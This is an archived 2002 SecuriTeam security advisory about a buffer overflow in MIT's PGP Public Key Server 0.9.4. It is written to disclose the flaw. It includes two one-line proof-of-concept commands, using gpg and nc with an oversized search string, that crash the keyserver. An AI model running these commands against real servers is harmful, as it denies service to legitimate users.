[UNIX] PGP Public Key Server DoS and Remote Code Execution
From: support@securiteam.comDate: 05/26/02
- Previous message: support@securiteam.com: "[UNIX] Gridscan.com Security-risk"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Sun, 26 May 2002 09:11:47 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
PGP Public Key Server DoS and Remote Code Execution
------------------------------------------------------------------------
SUMMARY
<http://www.mit.edu/people/marc/pks/pks.html> MIT's PKS (Public Key
Server) as been found to contain a buffer overflow that would allow an
attacker to cause it to execute arbitrary code, or in cases that execution
would fail, to cause it to no longer answer legitimate key requests.
DETAILS
Vulnerable systems:
* PGP Public Key Server version 0.9.4
A long enough (> 256b) search request will crash the service. It is as
simple as this:
#gpg --search-keys `perl -e "print 'A'x512"`
Or, without gpg,
#echo -e "GET /pks/lookup?op=index&search=`perl -e "print 'A'x512"`"| nc
keyserver-host 11371
Fortunately in order to cause it to execute code, the provided buffer
should be isalnum() string (is all numbers) and should be able to survive
tolower() conversion (convert to lower case).
ADDITIONAL INFORMATION
The information has been provided by <mailto:rusmir@tula.net> Max.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Gridscan.com Security-risk"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] LPRng/rhs-printfilters Vulnerability Leads to Remote Execution of Commands
... LPRng/rhs-printfilters Vulnerability Leads to Remote Execution of Commands ...
Unless the -R option is passed, the example file will execute the command ... The information
in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall
we be liable for any damages whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages. ... (Securiteam) - Re: Units, kilo, megga, milli, etc
... from the _Bulletin of Pharmacy_, in 1914, which proposes a new ... "American
System of Weights and Measures" ... What good is being an executive if you never get to execute
anyone? ... (alt.usage.english) - Revised: Microsoft Security Bulletin - MS02-019
... Unchecked Buffer in Internet Explorer and Office for Mac Can Cause Code to Execute
... This bulletin has been revised. ... commercial product which runs on Windows?
... (NT-Bugtraq) - user public key authentication
... I'm wondering if it is possible to use a public key to authenticate a ... I'm
trying to make a program that would allow a user to execute ... a command by using
a public key instead of a password. ... (microsoft.public.dotnet.security)